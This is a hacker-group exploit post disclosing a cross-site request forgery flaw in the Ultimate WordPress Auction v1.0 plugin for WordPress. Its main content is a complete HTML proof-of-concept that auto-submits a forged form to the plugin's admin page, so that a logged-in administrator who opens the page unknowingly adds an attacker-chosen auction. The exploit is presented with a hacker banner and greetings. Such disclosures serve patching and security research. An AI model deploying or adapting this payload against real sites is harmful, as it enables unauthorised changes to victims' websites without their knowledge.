facebook facebook twitter rss

Ultimate WordPress Auction v1.0 Plugin CSRF Vulnerability

Author: f4ry4r_red , Published: 16-09-2013
###########################################################################################
# Exploit Title: [ Ultimate WordPress Auction v1.0 Plugin CSRF Vulnerability ]
# Date: [2013-6-20]
# Exploit Author : HackFans
# Vendor Homepage : http://forums.hackfans.org/
# Software Link: [http://downloads.wordpress.org/plugin/ultimate-auction.zip]
# Version: [1.0]
# Tested on: [Wordpress 3.5.1 (Windows)]
# Contacts: { https://www.facebook.com/Hackfans.org }
###########################################################################################
#D:: ___ ____ ____
#````______/```\__//```\__/____\
#``_/```\_/``:```````````//____\
#`/|``````:``:``..``````/ f4ry4r_red \
#|`|`````::`````::``````\````````/
#|`|`````:|`````||`````\`\______/
#|`|`````||`````||``````|\``/``|
#`\|`````||`````||``````|```/`|`\
#``|`````||`````||``````|``/`/_\`\
#``|`___`||`___`||``````|`/``/````\
#```\_-_/``\_-_/`|`____`|/__/``````\
#````````````````_\_--_/````\`````/
#```````````````/____```````````/
#``````````````/`````\`````````/
#``````````````\______\_______/

# f4ry4r_red W4s H3r3...!


1. Plugin Description:
========================

The Ultimate WordPress Auction plugin allows easy and quick way to set up a professional auction website in ebay style.

2. Vulnerability Description:
==============================

This wordpress plugin "Ultimate WordPress Auction 1.0" suffers from CSRF vulnerability which can be successfully exploited by attacker to add Fake Auction Bids.


Affected URL:
--------------

http://127.0.0.1/wordpress-3.5.1/wordpress/wp-admin/admin.php?page=add-new-auction


eXpl0it code:
--------------

<html>
<head>
<script type="text/javascript" language="javascript">
function submitform()
{
document.getElementById('myForm').submit();
}
</script>
</head>
<body>

<form name="myForm" id="wdm-add-auction-form" class="auction_settings_section_style" action="http://127.0.0.1/wordpress-3.5.1/wordpress/wp-admin/admin.php?page=add-new-auction" method="POST" novalidate="novalidate">

Title:
<input name="auction_title" type="text" id="auction_title" class="regular-text valid" value="expl0iter">
Description:
<textarea name="auction_description" type="text" id="auction_description" cols="50" rows="10" class="large-text code valid">&lt;/textarea&gt;
<input name="opening_bid" type="text" id="opening_bid" class="small-text number" min="0" value="">
<input name="lowest_bid" type="text" id="lowest_bid" class="small-text number" min="0" value="">
<input name="incremental_value" type="text" id="incremental_value" class="small-text number" min="0" value="">
<input name="end_date" type="text" id="end_date" class="regular-text hasDatepicker" readonly="" value="2013-07-10 00:00:00">
<input name="buy_it_now_price" type="text" id="buy_it_now_price" class="small-text number" min="1" value="">
<input type="submit" name="submit" id="submit" class="button button-primary" value="Save Changes">

</form>

<script type="text/javascript" language="javascript">
document.myForm.submit()
</script>
</body>
</html>

Once victim clicks on this link new auction of attackers choice will be added.(provided victim logged in to wordpress)

################################################################################################################
Greetz : BlackErroR, X3NON ,Saman.gunner,HaCkeD,m3h2lad,Crack3R, ALI_TNP Crall of member In hackfans
################################################################################################################

Like us on Facebook :